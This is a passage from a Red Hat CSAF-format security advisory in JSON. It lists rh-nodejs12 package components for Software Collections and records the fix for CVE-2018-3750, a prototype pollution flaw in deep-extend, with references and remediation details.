Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" } ] }, "vulnerabilities": [ { "cve": "CVE-2018-3750", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2018-05-15T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1578246" } ], "notes": [ { "category": "description", "text": "The utilities function in all versions \u003c= 0.5.0 of the deep-extend node module can be tricked into modifying the prototype of Object when the attacker can control part of the structure passed to this function. This can let an attacker add or modify existing properties that will exist on all objects.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-deep-extend: Prototype pollution can allow attackers to modify object properties", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2018-3750" }, { "category": "external", "summary": "RHBZ#1578246", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1578246" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2018-3750", "url": "https://www.cve.org/CVERecord?id=CVE-2018-3750" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2018-3750", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3750" }, { "category": "external", "summary": "https://hackerone.com/reports/311333", "url": "https://hackerone.com/reports/311333" }, { "category": "external", "summary": "https://nodesecurity.io/advisories/612", "url": "https://nodesecurity.io/advisories/612" } ], "release_date": "2018-04-18T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-11T13:37:42+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", 